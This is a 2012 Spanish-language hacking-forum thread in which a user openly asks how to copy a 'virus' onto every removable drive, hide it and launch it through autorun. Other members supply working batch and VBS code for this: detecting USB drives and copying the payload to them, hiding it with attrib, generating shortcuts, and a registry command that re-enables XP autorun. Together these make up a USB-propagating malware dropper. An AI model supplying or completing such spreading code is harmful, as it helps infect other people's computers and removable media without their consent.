Foro de elhacker.net

Programación => Scripting => Mensaje iniciado por: imlikeabird34 en 23 Diciembre 2012, 18:25 pm


Título: [BATCH] copiar y ocultar virus en unidades extraibles
Publicado por: imlikeabird34 en 23 Diciembre 2012, 18:25 pm
Buenas tardes comunidad, tal y como dice el titulo del tema necesito un comando para copiar un ejecutable SOLO A LAS UNIDADES EXTRAIBLES.
Quizas exista alguna variable de entorno que desconozco.
Tengo este codigo pero tambien copia a unidades del disco duro y solo quiero q se copie en unidades extraibles:
Código:
@echo off
for %%unidad in (e f g h i j k l m n o p q r s t u v w x y z) do (
xcopy %userprofile%\desktop\virus.exe %unidad%: /Y
)
El virus debe estar oculto en una carpeta de la unidad extraible y debe crearse un acceso directo en el mismo.

Título: Re: [BATCH] copiar y ocultar virus en unidades extraibles
Publicado por: Segadorfelix en 23 Diciembre 2012, 18:31 pm
mmn Tal vez este post te sirva:
http://foro.elhacker.net/scripting/script_batch_para_infeccion_a_traves_de_unidades_extraibles-t250133.0.html

Título: Re: [BATCH] copiar y ocultar virus en unidades extraibles
Publicado por: imlikeabird34 en 24 Diciembre 2012, 02:50 am
lei el tema pero no se explica bien que hace cada linea de código ademas si hay mas de un disco extraible el archivo solo se copia a uno.
PD: La ayuda del fsutil es excasa

Título: Re: [BATCH] copiar y ocultar virus en unidades extraibles
Publicado por: Segadorfelix en 24 Diciembre 2012, 04:51 am
fsutil necesita derechos administrativos, solo es necesario el comando "fsutil fsinfo drives"; me parece mejor que hagas un "escaneo" de las unidades sin usb(por ejemplo el equipo sin usb escanea C: y D:), tambien que sepa si se ejecuta de una usb o de una unidad. :-\
Otro link con mas informacion
http://foro.elhacker.net/scripting/seleccionar_unidad_y_ejecutar_comando-t332007.0.html (http://foro.elhacker.net/scripting/seleccionar_unidad_y_ejecutar_comando-t332007.0.html)

Título: Re: [BATCH] copiar y ocultar virus en unidades extraibles
Publicado por: Eleкtro en 24 Diciembre 2012, 07:13 am
Código
  1. @Echo OFF
  2.  
  3. REM By Elektro H@cker
  4.  
  5. :: Obtenemos las letras de unidades conectadas
  6. For /F "tokens=* delims=Unidades:\ " %%@ in ('fsutil fsinfo drives') Do (
  7. 	Call Set "Drives=%%@"
  8. 	Call Set "Drives=%%DRIVES::=%%"
  9. 	Call Set "Drives=%%DRIVES:\=%%"
  10. 	Call :isUSB?
  11. 	REM Listar
  12. 	Call Echo [Unidades] %%USBs:~1%% | MORE
  13. )
  14.  
  15. :: FIN
  16. Echo Se han procesado todas las unidades. | MORE
  17. Pause&Exit
  18.  
  19. REM Comprueba si la unidad es un dispositivo USB
  20. :isUSB?
  21. For %%X in (%DRIVES%) Do (fsutil fsinfo drivetype %%X:\ | Find /I "extra" >NUL && (Call Set "USBs=%%USBs%% %%X"))
  22. Goto:EOF

> Buscar y Listar archivos con cierta extensión en una computadora (http://foro.elhacker.net/windows/buscar_y_listar_archivos_con_cierta_extension_en_una_computadora-t371782.0.html;msg1786139#msg1786139)


También te puede servir este script:

(http://img688.imageshack.us/img688/6033/prtscrcaptureme.jpg)

> [BATCH] [APORTE] USB MON (Roba USB) (http://foro.elhacker.net/empty-t372089.0.html)

Saludos

Título: Re: [BATCH] copiar y ocultar virus en unidades extraibles
Publicado por: imlikeabird34 en 26 Diciembre 2012, 04:53 am
gracias por tomarse la molestia muchachos, investigando y probando mi script va asi:
Código:
@echo off
for %%a in (D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z) do (
for /f  %%b in ('fsutil fsinfo drivetype %%a: ^| find "extra"') do (
xcopy /Y virus.bat %%b ))
Para finalizar, como hago para ocultar ese archivo dentro de una carpeta de la unidad extraible y como creo un acceso directo en el mismo?
Ademas me gustaria que se abra con el autorun.inf

Título: Re: [BATCH] copiar y ocultar virus en unidades extraibles
Publicado por: Segadorfelix en 26 Diciembre 2012, 05:17 am
Cita de: imlikeabird34 en 26 Diciembre 2012, 04:53 am
gracias por tomarse la molestia muchachos, investigando y probando mi script va asi:
Código:
@echo off
for %%a in (D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z) do (
for /f  %%b in ('fsutil fsinfo drivetype %%a: ^| find "extra"') do (
xcopy /Y virus.bat %%b ))
Para finalizar, como hago para ocultar ese archivo dentro de una carpeta de la unidad extraible y como creo un acceso directo en el mismo?
Ademas me gustaria que se abra con el autorun.inf
attrib para ocultar y VBS para crear los .lnk(esta en el tutorial de vbs por nov, en esta misma sección)
El autorun.inf, lo busco mas tarde y modifico el mensaje  :P (si es que alguien no lo hace antes  :xD )

Título: Re: [BATCH] copiar y ocultar virus en unidades extraibles
Publicado por: Eleкtro en 26 Diciembre 2012, 06:24 am
Cita de: imlikeabird34 en 26 Diciembre 2012, 04:53 am
Ademas me gustaria que se abra con el autorun.inf
Cita de: Segadorfelix en 26 Diciembre 2012, 05:17 am
El autorun.inf, lo busco mas tarde

Un autorun.inf para un pendrive es algo del pasado, obsoleto,
si van a utilizar Windows 7/8 es imposible ejecutar un autorun.inf porque Microsoft lo deshabilitó para dispositivos USB por medidas obvias de seguridad (A menos que usen un buen pendrive "camaleón" que se haga pasar por CD-ROM).

EDITO: Para WinXP no hay problema (Siempre que el servicio de reproducción automática esté activado en el equipo)


Código
  1. REM Ocultar un archivo:
  2. Copy "Archivo.ext" "...\Carpeta\"
  3. Attrib +H "...\Carpeta\Archivo.ext"

Código
  1. REM Crear un acceso directo:
  2. (
  3.  Echo: set objWSHShell = CreateObject("WScript.Shell"^)
  4.  Echo: set objFso      = CreateObject("Scripting.FileSystemObject"^)
  6.  Echo: File         = objFso.GetAbsolutePathName(WScript.Arguments.Item(0^)^)
  7.  Echo: S_File       = objWSHShell.ExpandEnvironmentStrings(WScript.Arguments.Item(1^)^)
  8.  Echo: S_WorkingDir = Left(File, InStrRev(File, "\"^) - 1^)
  10.  Echo: set Shortcut = objWSHShell.CreateShortcut(S_File^) 
  11.  Echo+ 
  12.  Echo: Shortcut.TargetPath       = File
  13.  Echo: Shortcut.WorkingDirectory = S_WorkingDir
  14.  Echo: Shortcut.Save
  15. )>"%TEMP%\Create_Shortcut.vbs"
  16.  
  17. WScript "%TEMP%\Create_Shortcut.vbs" "Archivo.txt" "C:\Archivo.lnk"


Saludos.

Título: Re: [BATCH] copiar y ocultar virus en unidades extraibles
Publicado por: imlikeabird34 en 27 Diciembre 2012, 04:48 am
me sirvió ya pude ocultar mi carpeta, tengo 4 preg(disculpen mi ignorancia, estoy dando mis primeros pasos).
1) con que  registro activo el servicio de reproducción automática en xp?
2) de que manera puedo ejecutar un archivo en windows 7 al insertar una unidad USB
3) podrían facilitarme un bat para la creación de accesos directos?
4) como agrego una contraseña a una carpeta o archivo

Título: Re: [BATCH] copiar y ocultar virus en unidades extraibles
Publicado por: Eleкtro en 27 Diciembre 2012, 08:56 am
Cita de: imlikeabird34 en 27 Diciembre 2012, 04:48 am
1) con que  registro activo el servicio de reproducción automática en xp?
Código
  1. REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /V "NoDriveTypeAutoRun" /T "REG_DWORD" /D "0x00000091" /F
http://www.askvg.com/how-to-disable-autorun-functionality-in-windows-using-registry-editor/

El servicio de reproducción automática no recuerdo cual es, lo tengo capado en mi windows, búscalo en la lista de servicios de windows (Botón inicio > ejecutar > Services.smc) y luego es tán sencillo como hacer un:
Código
  1. SC START "Nombre del servicio"


Cita de: imlikeabird34 en 27 Diciembre 2012, 04:48 am
2) de que manera puedo ejecutar un archivo en windows 7 al insertar una unidad USB
De ninguna manera, el autorun era lo único, pero como he explicado es algo obsoleto, deshabilitado en pendrives por medidas de seguridad.

PD: Si le pones ganas puedes programar una aplicación que monitorice las uniades extraíbles y ejecutar el programa deseado, pero obviamente deberás ejecutar tu aplicación programada manualmente.


Cita de: imlikeabird34 en 27 Diciembre 2012, 04:48 am
3) podrían facilitarme un bat para la creación de accesos directos?
Arriba te puse un archivo bat que sirve para eso.
Llámalo cono en el ejemplo:
Código
  1. WScript "%TEMP%\Create_Shortcut.vbs" "Archivo.ext" "C:\Archivo.lnk"


Cita de: imlikeabird34 en 27 Diciembre 2012, 04:48 am
4) como agrego una contraseña a una carpeta o archivo

No puedes proteger con contraseña nada usando Batch, lo único que puedes hacer es una chapuza como esto > http://www.howtogeek.com/105633/how-to-create-a-password-protected-folder-without-any-extra-software/

Código
  1. cls
  2. @ECHO OFF
  3. title Folder Private
  4. if EXIST "HTG Locker" goto UNLOCK
  5. if NOT EXIST Private goto MDLOCKER
  6. :CONFIRM
  7. echo Are you sure you want to lock the folder(Y/N)
  8. set/p "cho=>"
  9. if %cho%==Y goto LOCK
  10. if %cho%==y goto LOCK
  11. if %cho%==n goto END
  12. if %cho%==N goto END
  13. echo Invalid choice.
  14. goto CONFIRM
  15. :LOCK
  16. ren Private "HTG Locker"
  17. attrib +h +s "HTG Locker"
  18. echo Folder locked
  19. goto End
  20. :UNLOCK
  21. echo Enter password to unlock folder
  22. set/p "pass=>"
  23. if NOT %pass%== PASSWORD_GOES_HERE goto FAIL
  24. attrib -h -s "HTG Locker"
  25. ren "HTG Locker" Private
  26. echo Folder Unlocked successfully
  27. goto End
  28. :FAIL
  29. echo Invalid password
  30. goto end
  31. :MDLOCKER
  32. md Private
  33. echo Private created successfully
  34. goto End
  35. :End

Saludos


Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines